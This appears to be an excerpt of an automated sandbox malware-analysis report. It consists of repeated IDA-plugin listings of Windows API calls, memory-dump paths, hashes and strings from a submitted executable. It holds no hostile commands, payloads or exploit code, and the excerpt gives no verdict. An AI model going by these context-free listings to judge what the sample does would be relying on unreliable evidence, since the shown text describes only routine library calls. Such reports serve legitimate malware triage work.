                                                                                                • Part of subcall function 00A324EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00A32515
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00A32241
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00A3225B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00A32274
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A32280
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A3228C
                                                                                                • Part of subcall function 00A32303: WaitForSingleObject.KERNEL32(?,000000FF,00A32526,?), ref: 00A32309
                                                                                                • Part of subcall function 00A32303: GetLastError.KERNEL32(?), ref: 00A32315
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: 1fc18f5cf5cb78cea2d19313504ecfc4cc3f486cbfae6e7f11d36369eb62ad83
                                                                                              • Instruction ID: cbcecebe927e14fcfe39900c2552aa46761602e87d5129189599207f08683047
                                                                                              • Opcode Fuzzy Hash: 1fc18f5cf5cb78cea2d19313504ecfc4cc3f486cbfae6e7f11d36369eb62ad83
                                                                                              • Instruction Fuzzy Hash: A5017172000B04EFC7229BA4DD84BC6BBA9FB08715F104929F26B521A0CB796A96CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A4D9D7
                                                                                                • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
                                                                                                • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
                                                                                              • _free.LIBCMT ref: 00A4D9E9
                                                                                              • _free.LIBCMT ref: 00A4D9FB
                                                                                              • _free.LIBCMT ref: 00A4DA0D
                                                                                              • _free.LIBCMT ref: 00A4DA1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: dd60674c81311c92b9e45cb5da05acb065e914bdbedcd449cdf675dedaa40779
                                                                                              • Instruction ID: f2e25367803f1f90d19ca01b7e4a83eef4383fa08f9775b5688f0c12afc51bf6
                                                                                              • Opcode Fuzzy Hash: dd60674c81311c92b9e45cb5da05acb065e914bdbedcd449cdf675dedaa40779
                                                                                              • Instruction Fuzzy Hash: C6F01276554210AB8620DFA4F686C1AB7F9FB94B507990C0AF04CD7541CBB1FC808654
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A33340
                                                                                              • _wcslen.LIBCMT ref: 00A33351
                                                                                              • _wcslen.LIBCMT ref: 00A33361
                                                                                              • _wcslen.LIBCMT ref: 00A3336F
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00A2C844,?,?,00000000,?,?,?), ref: 00A3338A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: a1c0b145df164ee41fe38f3f1d3a80bcf02562738337d0e2b7d2cb2df16c8236
                                                                                              • Instruction ID: 219af9eceaa24fe8879e686862fa37ce16f51d359aa017170d0cdf9b5f86c6e6
                                                                                              • Opcode Fuzzy Hash: a1c0b145df164ee41fe38f3f1d3a80bcf02562738337d0e2b7d2cb2df16c8236
                                                                                              • Instruction Fuzzy Hash: C2F01D37008214BBCF126F51DC09DCE3F26EB98B71B258015F6196E061CE7296659690
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A49CEE
                                                                                                • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
                                                                                                • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
                                                                                              • _free.LIBCMT ref: 00A49D00
                                                                                              • _free.LIBCMT ref: 00A49D13
                                                                                              • _free.LIBCMT ref: 00A49D24
                                                                                              • _free.LIBCMT ref: 00A49D35
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 2873e8745b8e0dc86826a45a4aa85c6ea19f834c545596a0cca50de94ce9ad87
                                                                                              • Instruction ID: 8e73e7bb1bf56c8089ac09a970920f1645be564812d0c51c8b975ebf84e4f8f0
                                                                                              • Opcode Fuzzy Hash: 2873e8745b8e0dc86826a45a4aa85c6ea19f834c545596a0cca50de94ce9ad87
                                                                                              • Instruction Fuzzy Hash: 7DF0FE78845122DFC702EF94FD82C467BB1F7797213460606F41957275E77209638B85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: a3a056eeaec3f3c6e86aea0d6b0b8c4b3d6f7cdb422773d98b1baa622ef3b04d
                                                                                              • Instruction ID: b83b0db514a7b7d00032ee62ac80c21d0e403a078142567fb41b070f1e356c8b
                                                                                              • Opcode Fuzzy Hash: a3a056eeaec3f3c6e86aea0d6b0b8c4b3d6f7cdb422773d98b1baa622ef3b04d
                                                                                              • Instruction Fuzzy Hash: 5851C331A88300FFEA256F949D02F36B675AF14F41F204917FB9BB80E5C6A29550AB17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\H9gMIu2HXi.exe,00000104), ref: 00A49370
                                                                                              • _free.LIBCMT ref: 00A4943B
                                                                                              • _free.LIBCMT ref: 00A49445
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                              • API String ID: 2506810119-1714539950
                                                                                              • Opcode ID: bd70cad1e1f458febb046c5e07714fda0c1cc6447f8a533d36d74b84e3add0e0
                                                                                              • Instruction ID: 82b38219288fbbd0e91d665a3a1e6fb5594f732910ab9d75f6cbca9d43f1d5cc
                                                                                              • Opcode Fuzzy Hash: bd70cad1e1f458febb046c5e07714fda0c1cc6447f8a533d36d74b84e3add0e0
                                                                                              • Instruction Fuzzy Hash: 3F31A279A00218EFDB21DF99D985D9FBBFCEBC9710F1040AAF50497241D7705A528B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A4438B
                                                                                              • _abort.LIBCMT ref: 00A44496
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: 2690b3a73051c4db34c7bf89f362bc3a63c8c3229347795fd222598ad3d10786
                                                                                              • Instruction ID: 04fc63babc52d3c0e43c300151d43b7d4131ba173c24a5809bf0287172cafd7f
                                                                                              • Opcode Fuzzy Hash: 2690b3a73051c4db34c7bf89f362bc3a63c8c3229347795fd222598ad3d10786
                                                                                              • Instruction Fuzzy Hash: C2414876900209AFDF15DFA8DD81BAEBBB5BF88304F148159FA046B221D335EA61DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A27F20
                                                                                                • Part of subcall function 00A242F1: __EH_prolog.LIBCMT ref: 00A242F6
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00A27FE5
                                                                                                • Part of subcall function 00A28704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A28713
                                                                                                • Part of subcall function 00A28704: OpenProcessToken.ADVAPI32(00000000), ref: 00A2871A
                                                                                                • Part of subcall function 00A28704: GetLastError.KERNEL32 ref: 00A28759
                                                                                                • Part of subcall function 00A28704: CloseHandle.KERNEL32(?), ref: 00A28768
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLastProcess$CloseCurrentHandleOpenToken
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 2595646239-639343689
                                                                                              • Opcode ID: 3af9862cd0864720744f8d4c9a0d04c2d1e818f258929431798a05586d144c75
                                                                                              • Instruction ID: 81c273bbffc21943d959c920d174aa03f7b6097d376339ff6bb7d1c1786e20de
                                                                                              • Opcode Fuzzy Hash: 3af9862cd0864720744f8d4c9a0d04c2d1e818f258929431798a05586d144c75
                                                                                              • Instruction Fuzzy Hash: ED31E531D44264BEDF20EBACAE01BEE7BB9AB04354F004035F805A6195CBB88E49CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3BE68
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00A3BE7D
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A3BE92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              • Opcode ID: 806b6db6e48448094b2156fe037f95a03580aa5abad86d87acfeb0fc3d11d788
                                                                                              • Instruction ID: f3ded979f9278f689094c18b708543a4a63ba3906a6c9bd346be8aae90f96d54
                                                                                              • Opcode Fuzzy Hash: 806b6db6e48448094b2156fe037f95a03580aa5abad86d87acfeb0fc3d11d788
                                                                                              • Instruction Fuzzy Hash: 2E11B633610121BFD611DFACED09FBA37AAFB4AB40F140414FB40AB1B5C762990A9775
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00A2EC74
                                                                                              • _strncpy.LIBCMT ref: 00A2ECBA
                                                                                                • Part of subcall function 00A330F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00A63070,00000200,00A2EC48,00000000,?,00000050,00A63070), ref: 00A33112
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: 6e41e2fb8c0ad96825405fb688585f4b31f02cdba35d780156b2ca9779e405df
                                                                                              • Instruction ID: 03d91aa5da336f49223846ef97ce4454a4fd03cc59dfefffd7ddbd50d59960b5
                                                                                              • Opcode Fuzzy Hash: 6e41e2fb8c0ad96825405fb688585f4b31f02cdba35d780156b2ca9779e405df
                                                                                              • Instruction Fuzzy Hash: 30218E72540258AEEB21EFE8DE42FEE3BF8BF05740F040522FA1196191E371D6948B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00A2C04A,00000008,?,00000000,?,00A2E685,?,00000000), ref: 00A321A5
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00A2C04A,00000008,?,00000000,?,00A2E685,?,00000000), ref: 00A321AF
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00A2C04A,00000008,?,00000000,?,00A2E685,?,00000000), ref: 00A321BF
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00A321D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: e65c48a53a94aecbe53ce81930975879090b6e15ed01feaefd8fb19f8cf3630e
                                                                                              • Instruction ID: 3e9ffbde6adf941a57f0a30bf39045c62dac90a5eab90003349e24fec96c4740
                                                                                              • Opcode Fuzzy Hash: e65c48a53a94aecbe53ce81930975879090b6e15ed01feaefd8fb19f8cf3630e
                                                                                              • Instruction Fuzzy Hash: F111C6B1604709AFC3215F7ADD84AA7FBECFB59354F60492EF2D6C3200D67159818B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A212F6: GetDlgItem.USER32(00000000,00003021), ref: 00A2133A
                                                                                                • Part of subcall function 00A212F6: SetWindowTextW.USER32(00000000,00A545F4), ref: 00A21350
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3C4AE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 00A3C4C6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00A3C4F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: c87cc6b12677dec5ae705d20fe963cb874a2d7305fdce4776c4969c85ecb3f59
                                                                                              • Instruction ID: 3547d71550129c6e2684165e004fb37b6fdb5e375f10b7c1db2ffc0706c36367
                                                                                              • Opcode Fuzzy Hash: c87cc6b12677dec5ae705d20fe963cb874a2d7305fdce4776c4969c85ecb3f59
                                                                                              • Instruction Fuzzy Hash: B0119676A001187ADB209F789D5DFFB377CEB45B24F000521FB05F6080C6759D4697A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 190f55dc05c949bdced7cfb625d1fb625cce01cb6ea1ab7bee323536747d3015
                                                                                              • Instruction ID: acc84783470a1ae354748df02e19446c678fc7e4709df4c68fab32b1d68ebe1d
                                                                                              • Opcode Fuzzy Hash: 190f55dc05c949bdced7cfb625d1fb625cce01cb6ea1ab7bee323536747d3015
                                                                                              • Instruction Fuzzy Hash: C2017172A04245BFDB11CFA9EC48A577BB4BB05394F204425F905932F0D6B19C56DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00A2495C
                                                                                                • Part of subcall function 00A3FD1D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A3FD29
                                                                                                • Part of subcall function 00A3FD1D: ___delayLoadHelper2@8.DELAYIMP ref: 00A3FD4F
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00A24967
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                                              • String ID: string too long$vector too long
                                                                                              • API String ID: 2355824318-1617939282
                                                                                              • Opcode ID: b2280da6ded8260766d06e0358cf72ff6a408d221ad8ed77537b15969e674df3
                                                                                              • Instruction ID: bd9e6242040251bbdb4a75d2c117f845da3484e407b5ca9ae7ec1a9a49efa22e
                                                                                              • Opcode Fuzzy Hash: b2280da6ded8260766d06e0358cf72ff6a408d221ad8ed77537b15969e674df3
                                                                                              • Instruction Fuzzy Hash: EDF082312003146B4624AF5DFC4584BB3E9FF89B557100926FA4583606D7B0A9848AB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
